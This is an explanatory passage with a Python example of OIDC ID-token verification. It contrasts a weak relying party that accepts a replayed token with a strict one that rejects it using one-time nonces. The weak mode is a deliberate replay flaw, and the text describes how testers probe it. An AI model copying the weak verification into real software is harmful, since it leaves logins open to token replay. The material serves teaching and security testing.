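The relying-party check that decides whether the replay above succeeds, as an added example that is not part of the CompTIA guide or of any OIDC library. It mints an ID token, verifies it once, then presents the same token a second time: a relying party that skips nonce tracking accepts the replay, a strict one rejects it. So that it runs offline the tokens are signed with HS256 under a shared secret, which is an assumption for the example only; real providers sign with RS256/ES256 and publish keys at the JWKS endpoint, and the issuer and client_id values are placeholders.

```python
"""Relying-party verification of an OIDC ID token, weak and strict, against replay."""

import base64
import hashlib
import hmac
import json
import secrets
import time


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_id_token(claims, secret):
    """Mint an HS256 JWT; stands in for the provider's token endpoint."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    signature = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(signature)}"


class TokenRejected(Exception):
    pass


class RelyingParty:
    def __init__(self, secret, issuer, client_id, strict=True):
        self.secret, self.issuer, self.client_id, self.strict = secret, issuer, client_id, strict
        self.pending_nonces = set()      # nonces issued for logins that have not completed

    def start_login(self):
        """Generate the nonce that goes into the authorization request."""
        nonce = secrets.token_urlsafe(16)
        self.pending_nonces.add(nonce)
        return nonce

    def accept(self, token, now=None):
        now = time.time() if now is None else now
        try:
            header, payload, signature = token.split(".")
        except ValueError:
            raise TokenRejected("malformed token")
        if json.loads(b64url_decode(header)).get("alg") != "HS256":
            raise TokenRejected("unexpected alg")          # never trust the token's own choice
        expected = hmac.new(self.secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(signature)):
            raise TokenRejected("bad signature")
        claims = json.loads(b64url_decode(payload))
        if claims.get("iss") != self.issuer or claims.get("aud") != self.client_id:
            raise TokenRejected("issuer/audience mismatch")
        if claims.get("exp", 0) <= now:
            raise TokenRejected("expired")
        if self.strict:
            # One-time nonce: the token must answer a login this RP actually started, and
            # the same token presented again finds its nonce already consumed.
            nonce = claims.get("nonce")
            if nonce not in self.pending_nonces:
                raise TokenRejected("unknown or already-used nonce (replay)")
            self.pending_nonces.discard(nonce)
        return claims


def demo(strict, secret=b"constructed-shared-secret", now=1_700_000_000):
    """Verify a fresh token, then replay it; returns (subject, 'accepted'|'rejected')."""
    rp = RelyingParty(secret, "https://idp.example", "client-abc", strict=strict)
    nonce = rp.start_login()
    token = make_id_token({"iss": "https://idp.example", "aud": "client-abc", "sub": "user-1",
                           "iat": now, "exp": now + 300, "nonce": nonce}, secret)
    subject = rp.accept(token, now)["sub"]
    try:
        rp.accept(token, now)            # a captured token presented a second time
        replay = "accepted"
    except TokenRejected:
        replay = "rejected"
    return subject, replay


if __name__ == "__main__":
    print("weak RP:", demo(strict=False))
    print("strict RP:", demo(strict=True))
```

The weak relying party is not skipping signature, issuer, audience or expiry checks; it fails only because it treats the token as valid any number of times within its lifetime. The nonce set is what closes that window, and it is the check a tester with a dynamically registered client can probe directly by replaying a token they obtained legitimately.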